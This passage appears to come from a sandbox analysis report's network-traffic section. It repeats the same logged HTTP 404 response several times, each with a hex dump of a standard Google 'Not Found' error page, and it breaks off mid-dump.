Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 